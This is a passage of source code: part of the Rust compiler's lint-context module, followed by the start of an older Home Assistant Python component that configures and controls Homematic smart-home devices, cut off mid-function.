if lint_name.chars().any(char::is_uppercase) && self.find_lints(&name_lower).is_some() {
// First check if the lint name is (partly) in upper case instead of lower case...
return CheckLintNameResult::NoLint(Some((Symbol::intern(&name_lower), false)));
}
// ...if not, search for lints with a similar name
// Note: find_best_match_for_name depends on the sort order of its input vector.
// To ensure deterministic output, sort elements of the lint_groups hash map.
// Also, never suggest deprecated lint groups.
// We will soon sort, so the initial order does not matter.
#[allow(rustc::potential_query_instability)]
let mut groups: Vec<_> = self
.lint_groups
.iter()
.filter_map(|(k, LintGroup { depr, .. })| depr.is_none().then_some(k))
.collect();
groups.sort();
let groups = groups.iter().map(|k| Symbol::intern(k));
let lints = self.lints.iter().map(|l| Symbol::intern(&l.name_lower()));
let names: Vec<Symbol> = groups.chain(lints).collect();
let mut lookups = vec![Symbol::intern(&name_lower)];
if let Some(stripped) = name_lower.split("::").last() {
lookups.push(Symbol::intern(stripped));
}
let res = find_best_match_for_names(&names, &lookups, None);
let is_rustc = res.map_or_else(
|| false,
|s| name_lower.contains("::") && !s.as_str().starts_with(tool_name),
);
let suggestion = res.map(|s| (s, is_rustc));
CheckLintNameResult::NoLint(suggestion)
}
fn check_tool_name_for_backwards_compat(
&self,
lint_name: &str,
tool_name: &str,
) -> CheckLintNameResult<'_> {
let complete_name = format!("{tool_name}::{lint_name}");
match self.by_name.get(&complete_name) {
None => match self.lint_groups.get(&*complete_name) {
// Now we are sure, that this lint exists nowhere
None => self.no_lint_suggestion(lint_name, tool_name),
Some(LintGroup { lint_ids, .. }) => {
CheckLintNameResult::Tool(lint_ids, Some(complete_name))
}
},
Some(Id(id)) => CheckLintNameResult::Tool(slice::from_ref(id), Some(complete_name)),
Some(other) => {
debug!("got renamed lint {:?}", other);
CheckLintNameResult::NoLint(None)
}
}
}
}
/// Context for lint checking outside of type inference.
pub struct LateContext<'tcx> {
/// Type context we're checking in.
pub tcx: TyCtxt<'tcx>,
/// Current body, or `None` if outside a body.
pub enclosing_body: Option<hir::BodyId>,
/// Type-checking results for the current body. Access using the `typeck_results`
/// and `maybe_typeck_results` methods, which handle querying the typeck results on demand.
// FIXME(eddyb) move all the code accessing internal fields like this,
// to this module, to avoid exposing it to lint logic.
pub(super) cached_typeck_results: Cell<Option<&'tcx ty::TypeckResults<'tcx>>>,
/// Parameter environment for the item we are in.
pub param_env: ty::ParamEnv<'tcx>,
/// Items accessible from the crate being checked.
pub effective_visibilities: &'tcx EffectiveVisibilities,
pub last_node_with_lint_attrs: hir::HirId,
/// Generic type parameters in scope for the item we are in.
pub generics: Option<&'tcx hir::Generics<'tcx>>,
/// We are only looking at one module
pub only_module: bool,
}
/// Context for lint checking of the AST, after expansion, before lowering to HIR.
pub struct EarlyContext<'a> {
pub builder: LintLevelsBuilder<'a, crate::levels::TopDown>,
pub buffered: LintBuffer,
}
pub trait LintContext {
fn sess(&self) -> &Session;
// FIXME: These methods should not take an Into<MultiSpan> -- instead, callers should need to
// set the span in their `decorate` function (preferably using set_span).
/// Emit a lint at the appropriate level, with an optional associated span.
///
/// [`lint_level`]: rustc_middle::lint::lint_level#decorate-signature
#[track_caller]
fn opt_span_lint<S: Into<MultiSpan>>(
&self,
lint: &'static Lint,
span: Option<S>,
decorate: impl for<'a, 'b> FnOnce(&'b mut Diag<'a, ()>),
);
/// Emit a lint at `span` from a lint struct (some type that implements `LintDiagnostic`,
/// typically generated by `#[derive(LintDiagnostic)]`).
fn emit_span_lint<S: Into<MultiSpan>>(
&self,
lint: &'static Lint,
span: S,
decorator: impl for<'a> LintDiagnostic<'a, ()>,
) {
self.opt_span_lint(lint, Some(span), |lint| {
decorator.decorate_lint(lint);
});
}
/// Emit a lint at `span` from a lazily-constructed lint struct (some type that implements
/// `LintDiagnostic`, typically generated by `#[derive(LintDiagnostic)]`).
fn emit_span_lint_lazy<S: Into<MultiSpan>, L: for<'a> LintDiagnostic<'a, ()>>(
&self,
lint: &'static Lint,
span: S,
decorator: impl FnOnce() -> L,
) {
self.opt_span_lint(lint, Some(span), |lint| {
let decorator = decorator();
decorator.decorate_lint(lint);
});
}
/// Emit a lint at the appropriate level, with an associated span.
///
/// [`lint_level`]: rustc_middle::lint::lint_level#decorate-signature
#[track_caller]
fn span_lint<S: Into<MultiSpan>>(
&self,
lint: &'static Lint,
span: S,
decorate: impl for<'a, 'b> FnOnce(&'b mut Diag<'a, ()>),
) {
self.opt_span_lint(lint, Some(span), decorate);
}
/// Emit a lint from a lint struct (some type that implements `LintDiagnostic`, typically
/// generated by `#[derive(LintDiagnostic)]`).
fn emit_lint(&self, lint: &'static Lint, decorator: impl for<'a> LintDiagnostic<'a, ()>) {
self.opt_span_lint(lint, None as Option<Span>, |lint| {
decorator.decorate_lint(lint);
});
}
/// Emit a lint at the appropriate level, with no associated span.
///
/// [`lint_level`]: rustc_middle::lint::lint_level#decorate-signature
fn lint(&self, lint: &'static Lint, decorate: impl for<'a, 'b> FnOnce(&'b mut Diag<'a, ()>)) {
self.opt_span_lint(lint, None as Option<Span>, decorate);
}
/// This returns the lint level for the given lint at the current location.
fn get_lint_level(&self, lint: &'static Lint) -> LevelAndSource;
/// This function can be used to manually fulfill an expectation. This can
/// be used for lints which contain several spans, and should be suppressed,
/// if either location was marked with an expectation.
///
/// Note that this function should only be called for [`LintExpectationId`]s
/// retrieved from the current lint pass. Buffered or manually created ids can
/// cause ICEs.
fn fulfill_expectation(&self, expectation: LintExpectationId) {
// We need to make sure that submitted expectation ids are correctly fulfilled suppressed
// and stored between compilation sessions. To not manually do these steps, we simply create
// a dummy diagnostic and emit it as usual, which will be suppressed and stored like a
// normal expected lint diagnostic.
self.sess()
.dcx()
.struct_expect(
"this is a dummy diagnostic, to submit and store an expectation",
expectation,
)
.emit();
}
}
impl<'a> EarlyContext<'a> {
pub(crate) fn new(
sess: &'a Session,
features: &'a Features,
lint_added_lints: bool,
lint_store: &'a LintStore,
registered_tools: &'a RegisteredTools,
buffered: LintBuffer,
) -> EarlyContext<'a> {
EarlyContext {
builder: LintLevelsBuilder::new(
sess,
features,
lint_added_lints,
lint_store,
registered_tools,
),
buffered,
}
}
}
impl<'tcx> LintContext for LateContext<'tcx> {
/// Gets the overall compiler `Session` object.
fn sess(&self) -> &Session {
self.tcx.sess
}
fn opt_span_lint<S: Into<MultiSpan>>(
&self,
lint: &'static Lint,
span: Option<S>,
decorate: impl for<'a, 'b> FnOnce(&'b mut Diag<'a, ()>),
) {
let hir_id = self.last_node_with_lint_attrs;
match span {
Some(s) => self.tcx.node_span_lint(lint, hir_id, s, decorate),
None => self.tcx.node_lint(lint, hir_id, decorate),
}
}
fn get_lint_level(&self, lint: &'static Lint) -> LevelAndSource {
self.tcx.lint_level_at_node(lint, self.last_node_with_lint_attrs)
}
}
impl LintContext for EarlyContext<'_> {
/// Gets the overall compiler `Session` object.
fn sess(&self) -> &Session {
self.builder.sess()
}
fn opt_span_lint<S: Into<MultiSpan>>(
&self,
lint: &'static Lint,
span: Option<S>,
decorate: impl for<'a, 'b> FnOnce(&'b mut Diag<'a, ()>),
) {
self.builder.opt_span_lint(lint, span.map(|s| s.into()), decorate)
}
fn get_lint_level(&self, lint: &'static Lint) -> LevelAndSource {
self.builder.lint_level(lint)
}
}
impl<'tcx> LateContext<'tcx> {
/// The typing mode of the currently visited node. Use this when
/// building a new `InferCtxt`.
pub fn typing_mode(&self) -> TypingMode<'tcx> {
// FIXME(#132279): In case we're in a body, we should use a typing
// mode which reveals the opaque types defined by that body.
TypingMode::non_body_analysis()
}
pub fn typing_env(&self) -> TypingEnv<'tcx> {
TypingEnv { typing_mode: self.typing_mode(), param_env: self.param_env }
}
pub fn type_is_copy_modulo_regions(&self, ty: Ty<'tcx>) -> bool {
self.tcx.type_is_copy_modulo_regions(self.typing_env(), ty)
}
pub fn type_is_use_cloned_modulo_regions(&self, ty: Ty<'tcx>) -> bool {
self.tcx.type_is_use_cloned_modulo_regions(self.typing_env(), ty)
}
/// Gets the type-checking results for the current body,
/// or `None` if outside a body.
pub fn maybe_typeck_results(&self) -> Option<&'tcx ty::TypeckResults<'tcx>> {
self.cached_typeck_results.get().or_else(|| {
self.enclosing_body.map(|body| {
let typeck_results = self.tcx.typeck_body(body);
self.cached_typeck_results.set(Some(typeck_results));
typeck_results
})
})
}
/// Gets the type-checking results for the current body.
/// As this will ICE if called outside bodies, only call when working with
/// `Expr` or `Pat` nodes (they are guaranteed to be found only in bodies).
#[track_caller]
pub fn typeck_results(&self) -> &'tcx ty::TypeckResults<'tcx> {
self.maybe_typeck_results().expect("`LateContext::typeck_results` called outside of body")
}
/// Returns the final resolution of a `QPath`, or `Res::Err` if unavailable.
/// Unlike `.typeck_results().qpath_res(qpath, id)`, this can be used even outside
/// bodies (e.g. for paths in `hir::Ty`), without any risk of ICE-ing.
pub fn qpath_res(&self, qpath: &hir::QPath<'_>, id: hir::HirId) -> Res {
match *qpath {
hir::QPath::Resolved(_, path) => path.res,
hir::QPath::TypeRelative(..) => self
.maybe_typeck_results()
.filter(|typeck_results| typeck_results.hir_owner == id.owner)
.or_else(|| {
self.tcx
.has_typeck_results(id.owner.def_id)
.then(|| self.tcx.typeck(id.owner.def_id))
})
.and_then(|typeck_results| typeck_results.type_dependent_def(id))
.map_or(Res::Err, |(kind, def_id)| Res::Def(kind, def_id)),
}
}
/// Gets the absolute path of `def_id` as a vector of `Symbol`.
///
/// Note that this is kinda expensive because it has to
/// travel the tree and pretty-print. Use sparingly.
///
/// If you're trying to match for an item given by its path, use a
/// diagnostic item. If you're only interested in given sections, use more
/// specific functions, such as [`TyCtxt::crate_name`]
///
/// FIXME: It would be great if this could be optimized.
///
/// # Examples
///
/// ```rust,ignore (no context or def id available)
/// let def_path = cx.get_def_path(def_id);
/// if let &[sym::core, sym::option, sym::Option] = &def_path[..] {
/// // The given `def_id` is that of an `Option` type
/// }
/// ```
pub fn get_def_path(&self, def_id: DefId) -> Vec<Symbol> {
struct LintPathPrinter<'tcx> {
tcx: TyCtxt<'tcx>,
path: Vec<Symbol>,
}
impl<'tcx> Printer<'tcx> for LintPathPrinter<'tcx> {
fn tcx(&self) -> TyCtxt<'tcx> {
self.tcx
}
fn print_region(&mut self, _region: ty::Region<'_>) -> Result<(), PrintError> {
unreachable!(); // because `print_path_with_generic_args` ignores the `GenericArgs`
}
fn print_type(&mut self, _ty: Ty<'tcx>) -> Result<(), PrintError> {
unreachable!(); // because `print_path_with_generic_args` ignores the `GenericArgs`
}
fn print_dyn_existential(
&mut self,
_predicates: &'tcx ty::List<ty::PolyExistentialPredicate<'tcx>>,
) -> Result<(), PrintError> {
unreachable!(); // because `print_path_with_generic_args` ignores the `GenericArgs`
}
fn print_const(&mut self, _ct: ty::Const<'tcx>) -> Result<(), PrintError> {
unreachable!(); // because `print_path_with_generic_args` ignores the `GenericArgs`
}
fn print_crate_name(&mut self, cnum: CrateNum) -> Result<(), PrintError> {
self.path = vec![self.tcx.crate_name(cnum)];
Ok(())
}
fn print_path_with_qualified(
&mut self,
self_ty: Ty<'tcx>,
trait_ref: Option<ty::TraitRef<'tcx>>,
) -> Result<(), PrintError> {
if trait_ref.is_none()
&& let ty::Adt(def, args) = self_ty.kind()
{
return self.print_def_path(def.did(), args);
}
// This shouldn't ever be needed, but just in case:
with_no_trimmed_paths!({
self.path = vec![match trait_ref {
Some(trait_ref) => Symbol::intern(&format!("{trait_ref:?}")),
None => Symbol::intern(&format!("<{self_ty}>")),
}];
Ok(())
})
}
fn print_path_with_impl(
&mut self,
print_prefix: impl FnOnce(&mut Self) -> Result<(), PrintError>,
self_ty: Ty<'tcx>,
trait_ref: Option<ty::TraitRef<'tcx>>,
) -> Result<(), PrintError> {
print_prefix(self)?;
// This shouldn't ever be needed, but just in case:
self.path.push(match trait_ref {
Some(trait_ref) => {
with_no_trimmed_paths!(Symbol::intern(&format!(
"<impl {} for {}>",
trait_ref.print_only_trait_path(),
self_ty
)))
}
None => {
with_no_trimmed_paths!(Symbol::intern(&format!("<impl {self_ty}>")))
}
});
Ok(())
}
fn print_path_with_simple(
&mut self,
print_prefix: impl FnOnce(&mut Self) -> Result<(), PrintError>,
disambiguated_data: &DisambiguatedDefPathData,
) -> Result<(), PrintError> {
print_prefix(self)?;
// Skip `::{{extern}}` blocks and `::{{constructor}}` on tuple/unit structs.
if let DefPathData::ForeignMod | DefPathData::Ctor = disambiguated_data.data {
return Ok(());
}
self.path.push(match disambiguated_data.data.get_opt_name() {
Some(sym) => sym,
None => Symbol::intern(&disambiguated_data.data.to_string()),
});
Ok(())
}
fn print_path_with_generic_args(
&mut self,
print_prefix: impl FnOnce(&mut Self) -> Result<(), PrintError>,
_args: &[GenericArg<'tcx>],
) -> Result<(), PrintError> {
print_prefix(self)
}
}
let mut p = LintPathPrinter { tcx: self.tcx, path: vec![] };
p.print_def_path(def_id, &[]).unwrap();
p.path
}
/// Returns the associated type `name` for `self_ty` as an implementation of `trait_id`.
/// Do not invoke without first verifying that the type implements the trait.
pub fn get_associated_type(
&self,
self_ty: Ty<'tcx>,
trait_id: DefId,
name: Symbol,
) -> Option<Ty<'tcx>> {
let tcx = self.tcx;
tcx.associated_items(trait_id)
.find_by_ident_and_kind(tcx, Ident::with_dummy_span(name), ty::AssocTag::Type, trait_id)
.and_then(|assoc| {
let proj = Ty::new_projection(tcx, assoc.def_id, [self_ty]);
tcx.try_normalize_erasing_regions(self.typing_env(), proj).ok()
})
}
/// Returns the effective precedence of an expression for the purpose of
/// rendering diagnostic. This is not the same as the precedence that would
/// be used for pretty-printing HIR by rustc_hir_pretty.
pub fn precedence(&self, expr: &hir::Expr<'_>) -> ExprPrecedence {
let has_attr = |id: hir::HirId| -> bool {
for attr in self.tcx.hir_attrs(id) {
if attr.span().desugaring_kind().is_none() {
return true;
}
}
false
};
expr.precedence(&has_attr)
}
/// If the given expression is a local binding, find the initializer expression.
/// If that initializer expression is another local binding, find its initializer again.
///
/// This process repeats as long as possible (but usually no more than once).
/// Type-check adjustments are not taken in account in this function.
///
/// Examples:
/// ```
/// let abc = 1;
/// let def = abc + 2;
/// // ^^^^^^^ output
/// let def = def;
/// dbg!(def);
/// // ^^^ input
/// ```
pub fn expr_or_init<'a>(&self, mut expr: &'a hir::Expr<'tcx>) -> &'a hir::Expr<'tcx> {
expr = expr.peel_blocks();
while let hir::ExprKind::Path(ref qpath) = expr.kind
&& let Some(parent_node) = match self.qpath_res(qpath, expr.hir_id) {
Res::Local(hir_id) => Some(self.tcx.parent_hir_node(hir_id)),
_ => None,
}
&& let Some(init) = match parent_node {
hir::Node::Expr(expr) => Some(expr),
hir::Node::LetStmt(hir::LetStmt {
init,
// Binding is immutable, init cannot be re-assigned
pat: Pat { kind: PatKind::Binding(BindingMode::NONE, ..), .. },
..
}) => *init,
_ => None,
}
{
expr = init.peel_blocks();
}
expr
}
/// If the given expression is a local binding, find the initializer expression.
/// If that initializer expression is another local or **outside** (`const`/`static`)
/// binding, find its initializer again.
///
/// This process repeats as long as possible (but usually no more than once).
/// Type-check adjustments are not taken in account in this function.
///
/// Examples:
/// ```
/// const ABC: i32 = 1;
/// // ^ output
/// let def = ABC;
/// dbg!(def);
/// // ^^^ input
///
/// // or...
/// let abc = 1;
/// let def = abc + 2;
/// // ^^^^^^^ output
/// dbg!(def);
/// // ^^^ input
/// ```
pub fn expr_or_init_with_outside_body<'a>(
&self,
mut expr: &'a hir::Expr<'tcx>,
) -> &'a hir::Expr<'tcx> {
expr = expr.peel_blocks();
while let hir::ExprKind::Path(ref qpath) = expr.kind
&& let Some(parent_node) = match self.qpath_res(qpath, expr.hir_id) {
Res::Local(hir_id) => Some(self.tcx.parent_hir_node(hir_id)),
Res::Def(_, def_id) => self.tcx.hir_get_if_local(def_id),
_ => None,
}
&& let Some(init) = match parent_node {
hir::Node::Expr(expr) => Some(expr),
hir::Node::LetStmt(hir::LetStmt {
init,
// Binding is immutable, init cannot be re-assigned
pat: Pat { kind: PatKind::Binding(BindingMode::NONE, ..), .. },
..
}) => *init,
hir::Node::Item(item) => match item.kind {
// FIXME(mgca): figure out how to handle ConstArgKind::Path (or don't but add warning in docs here)
hir::ItemKind::Const(.., hir::ConstItemRhs::Body(body_id))
| hir::ItemKind::Static(.., body_id) => Some(self.tcx.hir_body(body_id).value),
_ => None,
},
_ => None,
}
{
expr = init.peel_blocks();
}
expr
}
}
impl<'tcx> abi::HasDataLayout for LateContext<'tcx> {
#[inline]
fn data_layout(&self) -> &abi::TargetDataLayout {
&self.tcx.data_layout
}
}
impl<'tcx> ty::layout::HasTyCtxt<'tcx> for LateContext<'tcx> {
#[inline]
fn tcx(&self) -> TyCtxt<'tcx> {
self.tcx
}
}
impl<'tcx> ty::layout::HasTypingEnv<'tcx> for LateContext<'tcx> {
#[inline]
fn typing_env(&self) -> ty::TypingEnv<'tcx> {
self.typing_env()
}
}
impl<'tcx> LayoutOfHelpers<'tcx> for LateContext<'tcx> {
type LayoutOfResult = Result<TyAndLayout<'tcx>, LayoutError<'tcx>>;
#[inline]
fn handle_layout_err(&self, err: LayoutError<'tcx>, _: Span, _: Ty<'tcx>) -> LayoutError<'tcx> {
err
}
} | rust | github | https://github.com/rust-lang/rust | compiler/rustc_lint/src/context.rs |
"""
Support for Homematic devices.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/homematic/
"""
import os
import time
import logging
from datetime import timedelta
from functools import partial
import voluptuous as vol
import homeassistant.helpers.config_validation as cv
from homeassistant.const import (
EVENT_HOMEASSISTANT_STOP, STATE_UNKNOWN, CONF_USERNAME, CONF_PASSWORD,
CONF_PLATFORM, CONF_HOSTS, CONF_NAME, ATTR_ENTITY_ID)
from homeassistant.helpers import discovery
from homeassistant.helpers.entity import Entity
from homeassistant.helpers.event import track_time_interval
from homeassistant.config import load_yaml_config_file
DOMAIN = 'homematic'
REQUIREMENTS = ["pyhomematic==0.1.22"]
SCAN_INTERVAL_HUB = timedelta(seconds=300)
SCAN_INTERVAL_VARIABLES = timedelta(seconds=30)
DISCOVER_SWITCHES = 'homematic.switch'
DISCOVER_LIGHTS = 'homematic.light'
DISCOVER_SENSORS = 'homematic.sensor'
DISCOVER_BINARY_SENSORS = 'homematic.binary_sensor'
DISCOVER_COVER = 'homematic.cover'
DISCOVER_CLIMATE = 'homematic.climate'
ATTR_DISCOVER_DEVICES = 'devices'
ATTR_PARAM = 'param'
ATTR_CHANNEL = 'channel'
ATTR_NAME = 'name'
ATTR_ADDRESS = 'address'
ATTR_VALUE = 'value'
ATTR_PROXY = 'proxy'
EVENT_KEYPRESS = 'homematic.keypress'
EVENT_IMPULSE = 'homematic.impulse'
SERVICE_VIRTUALKEY = 'virtualkey'
SERVICE_RECONNECT = 'reconnect'
SERVICE_SET_VAR_VALUE = 'set_var_value'
SERVICE_SET_DEV_VALUE = 'set_dev_value'
HM_DEVICE_TYPES = {
DISCOVER_SWITCHES: [
'Switch', 'SwitchPowermeter', 'IOSwitch', 'IPSwitch',
'IPSwitchPowermeter', 'KeyMatic', 'HMWIOSwitch'],
DISCOVER_LIGHTS: ['Dimmer', 'KeyDimmer'],
DISCOVER_SENSORS: [
'SwitchPowermeter', 'Motion', 'MotionV2', 'RemoteMotion', 'MotionIP',
'ThermostatWall', 'AreaThermostat', 'RotaryHandleSensor',
'WaterSensor', 'PowermeterGas', 'LuxSensor', 'WeatherSensor',
'WeatherStation', 'ThermostatWall2', 'TemperatureDiffSensor',
'TemperatureSensor', 'CO2Sensor', 'IPSwitchPowermeter', 'HMWIOSwitch'],
DISCOVER_CLIMATE: [
'Thermostat', 'ThermostatWall', 'MAXThermostat', 'ThermostatWall2',
'MAXWallThermostat', 'IPThermostat'],
DISCOVER_BINARY_SENSORS: [
'ShutterContact', 'Smoke', 'SmokeV2', 'Motion', 'MotionV2',
'RemoteMotion', 'WeatherSensor', 'TiltSensor', 'IPShutterContact',
'HMWIOSwitch', 'MaxShutterContact'],
DISCOVER_COVER: ['Blind', 'KeyBlind']
}
HM_IGNORE_DISCOVERY_NODE = [
'ACTUAL_TEMPERATURE',
'ACTUAL_HUMIDITY'
]
HM_ATTRIBUTE_SUPPORT = {
'LOWBAT': ['battery', {0: 'High', 1: 'Low'}],
'ERROR': ['sabotage', {0: 'No', 1: 'Yes'}],
'RSSI_DEVICE': ['rssi', {}],
'VALVE_STATE': ['valve', {}],
'BATTERY_STATE': ['battery', {}],
'CONTROL_MODE': ['mode', {0: 'Auto', 1: 'Manual', 2: 'Away', 3: 'Boost'}],
'POWER': ['power', {}],
'CURRENT': ['current', {}],
'VOLTAGE': ['voltage', {}],
'WORKING': ['working', {0: 'No', 1: 'Yes'}],
}
HM_PRESS_EVENTS = [
'PRESS_SHORT',
'PRESS_LONG',
'PRESS_CONT',
'PRESS_LONG_RELEASE',
'PRESS',
]
HM_IMPULSE_EVENTS = [
'SEQUENCE_OK',
]
_LOGGER = logging.getLogger(__name__)
CONF_RESOLVENAMES_OPTIONS = [
'metadata',
'json',
'xml',
False
]
DATA_HOMEMATIC = 'homematic'
DATA_DELAY = 'homematic_delay'
DATA_DEVINIT = 'homematic_devinit'
DATA_STORE = 'homematic_store'
CONF_LOCAL_IP = 'local_ip'
CONF_LOCAL_PORT = 'local_port'
CONF_IP = 'ip'
CONF_PORT = 'port'
CONF_CALLBACK_IP = "callback_ip"
CONF_CALLBACK_PORT = "callback_port"
CONF_RESOLVENAMES = 'resolvenames'
CONF_VARIABLES = 'variables'
CONF_DEVICES = 'devices'
CONF_DELAY = 'delay'
CONF_PRIMARY = 'primary'
DEFAULT_LOCAL_IP = "0.0.0.0"
DEFAULT_LOCAL_PORT = 0
DEFAULT_RESOLVENAMES = False
DEFAULT_PORT = 2001
DEFAULT_USERNAME = "Admin"
DEFAULT_PASSWORD = ""
DEFAULT_VARIABLES = False
DEFAULT_DEVICES = True
DEFAULT_DELAY = 0.5
DEFAULT_PRIMARY = False
DEVICE_SCHEMA = vol.Schema({
vol.Required(CONF_PLATFORM): "homematic",
vol.Required(ATTR_NAME): cv.string,
vol.Required(ATTR_ADDRESS): cv.string,
vol.Required(ATTR_PROXY): cv.string,
vol.Optional(ATTR_CHANNEL, default=1): vol.Coerce(int),
vol.Optional(ATTR_PARAM): cv.string,
})
CONFIG_SCHEMA = vol.Schema({
DOMAIN: vol.Schema({
vol.Required(CONF_HOSTS): {cv.match_all: {
vol.Required(CONF_IP): cv.string,
vol.Optional(CONF_PORT, default=DEFAULT_PORT):
cv.port,
vol.Optional(CONF_USERNAME, default=DEFAULT_USERNAME): cv.string,
vol.Optional(CONF_PASSWORD, default=DEFAULT_PASSWORD): cv.string,
vol.Optional(CONF_VARIABLES, default=DEFAULT_VARIABLES):
cv.boolean,
vol.Optional(CONF_RESOLVENAMES, default=DEFAULT_RESOLVENAMES):
vol.In(CONF_RESOLVENAMES_OPTIONS),
vol.Optional(CONF_DEVICES, default=DEFAULT_DEVICES): cv.boolean,
vol.Optional(CONF_PRIMARY, default=DEFAULT_PRIMARY): cv.boolean,
vol.Optional(CONF_CALLBACK_IP): cv.string,
vol.Optional(CONF_CALLBACK_PORT): cv.port,
}},
vol.Optional(CONF_LOCAL_IP, default=DEFAULT_LOCAL_IP): cv.string,
vol.Optional(CONF_LOCAL_PORT, default=DEFAULT_LOCAL_PORT): cv.port,
vol.Optional(CONF_DELAY, default=DEFAULT_DELAY): vol.Coerce(float),
}),
}, extra=vol.ALLOW_EXTRA)
SCHEMA_SERVICE_VIRTUALKEY = vol.Schema({
vol.Required(ATTR_ADDRESS): vol.All(cv.string, vol.Upper),
vol.Required(ATTR_CHANNEL): vol.Coerce(int),
vol.Required(ATTR_PARAM): cv.string,
vol.Optional(ATTR_PROXY): cv.string,
})
SCHEMA_SERVICE_SET_VAR_VALUE = vol.Schema({
vol.Required(ATTR_NAME): cv.string,
vol.Required(ATTR_VALUE): cv.match_all,
vol.Optional(ATTR_ENTITY_ID): cv.entity_ids,
})
SCHEMA_SERVICE_SET_DEV_VALUE = vol.Schema({
vol.Required(ATTR_ADDRESS): vol.All(cv.string, vol.Upper),
vol.Required(ATTR_CHANNEL): vol.Coerce(int),
vol.Required(ATTR_PARAM): vol.All(cv.string, vol.Upper),
vol.Required(ATTR_VALUE): cv.match_all,
vol.Optional(ATTR_PROXY): cv.string,
})
SCHEMA_SERVICE_RECONNECT = vol.Schema({})
def virtualkey(hass, address, channel, param, proxy=None):
"""Send virtual keypress to homematic controlller."""
data = {
ATTR_ADDRESS: address,
ATTR_CHANNEL: channel,
ATTR_PARAM: param,
ATTR_PROXY: proxy,
}
hass.services.call(DOMAIN, SERVICE_VIRTUALKEY, data)
def set_var_value(hass, entity_id, value):
"""Change value of homematic system variable."""
data = {
ATTR_ENTITY_ID: entity_id,
ATTR_VALUE: value,
}
hass.services.call(DOMAIN, SERVICE_SET_VAR_VALUE, data)
def set_dev_value(hass, address, channel, param, value, proxy=None):
"""Send virtual keypress to homematic controlller."""
data = {
ATTR_ADDRESS: address,
ATTR_CHANNEL: channel,
ATTR_PARAM: param,
ATTR_VALUE: value,
ATTR_PROXY: proxy,
}
hass.services.call(DOMAIN, SERVICE_SET_DEV_VALUE, data)
def reconnect(hass):
"""Reconnect to CCU/Homegear."""
hass.services.call(DOMAIN, SERVICE_RECONNECT, {})
# pylint: disable=unused-argument
def setup(hass, config):
"""Setup the Homematic component."""
from pyhomematic import HMConnection
hass.data[DATA_DELAY] = config[DOMAIN].get(CONF_DELAY)
hass.data[DATA_DEVINIT] = {}
hass.data[DATA_STORE] = []
# create hosts list for pyhomematic
remotes = {}
hosts = {}
for rname, rconfig in config[DOMAIN][CONF_HOSTS].items():
server = rconfig.get(CONF_IP)
remotes[rname] = {}
remotes[rname][CONF_IP] = server
remotes[rname][CONF_PORT] = rconfig.get(CONF_PORT)
remotes[rname][CONF_RESOLVENAMES] = rconfig.get(CONF_RESOLVENAMES)
remotes[rname][CONF_USERNAME] = rconfig.get(CONF_USERNAME)
remotes[rname][CONF_PASSWORD] = rconfig.get(CONF_PASSWORD)
remotes[rname]['callbackip'] = rconfig.get(CONF_CALLBACK_IP)
remotes[rname]['callbackport'] = rconfig.get(CONF_CALLBACK_PORT)
if server not in hosts or rconfig.get(CONF_PRIMARY):
hosts[server] = {
CONF_VARIABLES: rconfig.get(CONF_VARIABLES),
CONF_NAME: rname,
}
hass.data[DATA_DEVINIT][rname] = rconfig.get(CONF_DEVICES)
# Create server thread
bound_system_callback = partial(_system_callback_handler, hass, config)
hass.data[DATA_HOMEMATIC] = HMConnection(
local=config[DOMAIN].get(CONF_LOCAL_IP),
localport=config[DOMAIN].get(CONF_LOCAL_PORT),
remotes=remotes,
systemcallback=bound_system_callback,
interface_id="homeassistant"
)
# Start server thread, connect to peer, initialize to receive events
hass.data[DATA_HOMEMATIC].start()
# Stops server when Homeassistant is shutting down
hass.bus.listen_once(
EVENT_HOMEASSISTANT_STOP, hass.data[DATA_HOMEMATIC].stop)
# init homematic hubs
entity_hubs = []
for _, hub_data in hosts.items():
entity_hubs.append(HMHub(
hass, hub_data[CONF_NAME], hub_data[CONF_VARIABLES]))
# regeister homematic services
descriptions = load_yaml_config_file(
os.path.join(os.path.dirname(__file__), 'services.yaml'))
def _hm_service_virtualkey(service):
"""Service handle virtualkey services."""
address = service.data.get(ATTR_ADDRESS)
channel = service.data.get(ATTR_CHANNEL)
param = service.data.get(ATTR_PARAM)
# device not found
hmdevice = _device_from_servicecall(hass, service)
if hmdevice is None:
_LOGGER.error("%s not found for service virtualkey!", address)
return
# if param exists for this device
if param not in hmdevice.ACTIONNODE:
_LOGGER.error("%s not datapoint in hm device %s", param, address)
return
# channel exists?
if channel not in hmdevice.ACTIONNODE[param]:
_LOGGER.error("%i is not a channel in hm device %s",
channel, address)
return
# call key
hmdevice.actionNodeData(param, True, channel)
hass.services.register(
DOMAIN, SERVICE_VIRTUALKEY, _hm_service_virtualkey,
descriptions[DOMAIN][SERVICE_VIRTUALKEY],
schema=SCHEMA_SERVICE_VIRTUALKEY)
def _service_handle_value(service):
"""Set value on homematic variable."""
entity_ids = service.data.get(ATTR_ENTITY_ID)
name = service.data[ATTR_NAME]
value = service.data[ATTR_VALUE]
if entity_ids:
entities = [entity for entity in entity_hubs if
entity.entity_id in entity_ids]
else:
entities = entity_hubs
if not entities:
_LOGGER.error("Homematic controller not found!")
return
for hub in entities:
hub.hm_set_variable(name, value)
hass.services.register(
DOMAIN, SERVICE_SET_VAR_VALUE, _service_handle_value,
descriptions[DOMAIN][SERVICE_SET_VAR_VALUE],
schema=SCHEMA_SERVICE_SET_VAR_VALUE)
def _service_handle_reconnect(service):
"""Reconnect to all homematic hubs."""
hass.data[DATA_HOMEMATIC].reconnect()
hass.services.register(
DOMAIN, SERVICE_RECONNECT, _service_handle_reconnect,
descriptions[DOMAIN][SERVICE_RECONNECT],
schema=SCHEMA_SERVICE_RECONNECT)
def _service_handle_device(service):
"""Service handle set_dev_value services."""
address = service.data.get(ATTR_ADDRESS)
channel = service.data.get(ATTR_CHANNEL)
param = service.data.get(ATTR_PARAM)
value = service.data.get(ATTR_VALUE)
# device not found
hmdevice = _device_from_servicecall(hass, service)
if hmdevice is None:
_LOGGER.error("%s not found!", address)
return
# call key
hmdevice.setValue(param, value, channel)
hass.services.register(
DOMAIN, SERVICE_SET_DEV_VALUE, _service_handle_device,
descriptions[DOMAIN][SERVICE_SET_DEV_VALUE],
schema=SCHEMA_SERVICE_SET_DEV_VALUE)
return True
def _system_callback_handler(hass, config, src, *args):
"""Callback handler."""
if src == 'newDevices':
_LOGGER.debug("newDevices with: %s", args)
# pylint: disable=unused-variable
(interface_id, dev_descriptions) = args
proxy = interface_id.split('-')[-1]
# device support active?
if not hass.data[DATA_DEVINIT][proxy]:
return
##
